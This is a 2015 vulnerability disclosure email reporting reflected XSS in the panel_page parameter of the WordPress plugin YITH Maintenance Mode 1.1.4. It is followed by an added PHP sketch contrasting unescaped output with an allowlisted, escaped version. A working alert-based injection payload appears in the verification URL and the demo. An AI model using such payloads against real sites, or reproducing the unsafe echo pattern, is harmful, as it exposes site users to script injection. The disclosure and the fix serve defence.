Subject: Cross-Site Scripting (XSS) in YITH Maintenance Mode 1.1.4
Date: Fri, 21 Aug 2015 11:57:18 +0200

Hello,

Plugin: YITH Maintenance Mode 1.1.4 https://wordpress.org/plugins/yith-maintenance-mode/

1. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can store HTML/JS code (there is no CSRF protection).

Method: GET/POST
URL: http://localhost/wp-admin/themes.php?page=yith-maintenance-mode&panel_page=[xss]
Vulnerable parameters: panel_page

Example PHP callstack:
YITH_Panel::display_panel_page   [/yith-maintenance-mode/yit-common/yith-panel.php:163]

Verification:
http://localhost/wp-admin/themes.php?page=yith-maintenance-mode&panel_page=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E


--
Regards,
Marcin Probola,
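
Added example, not part of the original message and not the plugin's source: a minimal PHP sketch of the pattern the advisory describes, where `panel_page` is echoed into an HTML attribute unescaped, next to a hardened version. The function names, the `<input>` markup and the tab names are hypothetical. The query string is the one from the verification URL above, and plain `htmlspecialchars()` stands in for WordPress's `esc_attr()` so the script runs without WordPress.

```php
<?php
// Illustration only: hypothetical rendering code, not taken from yith-panel.php.

// Vulnerable pattern: the request value goes into an attribute as-is.
function render_panel_unsafe(array $query): string
{
    $page = $query['panel_page'] ?? '';
    return '<input type="hidden" name="panel_page" value="' . $page . '" />';
}

// Hardened pattern: accept only known panel names, then escape for the
// attribute context anyway so a later change to the allowlist cannot
// reintroduce the bug. Inside WordPress, esc_attr() would do the escaping.
function render_panel_safe(array $query, array $known_pages): string
{
    $page = $query['panel_page'] ?? '';
    if (!is_string($page) || !in_array($page, $known_pages, true)) {
        $page = $known_pages[0]; // fall back to the default tab
    }
    $escaped = htmlspecialchars($page, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="panel_page" value="' . $escaped . '" />';
}

// Query string from the advisory's verification URL.
$qs = 'page=yith-maintenance-mode'
    . '&panel_page=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E';
parse_str($qs, $query); // URL-decodes the values, as PHP does for $_GET

$known_pages = ['general', 'settings']; // constructed tab names

echo "decoded value : ", $query['panel_page'], "\n";
echo "unsafe output : ", render_panel_unsafe($query), "\n";
echo "safe output   : ", render_panel_safe($query, $known_pages), "\n";

// Escaping alone, without the allowlist, already keeps the value inside
// the attribute: the quote and angle brackets become entities.
echo "escaped only  : ",
    htmlspecialchars($query['panel_page'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'),
    "\n";
```

In the unsafe output the decoded `">` closes the `value` attribute and the tag, so the rest of the parameter is parsed as markup. In the safe output the unknown value is replaced by the default tab name.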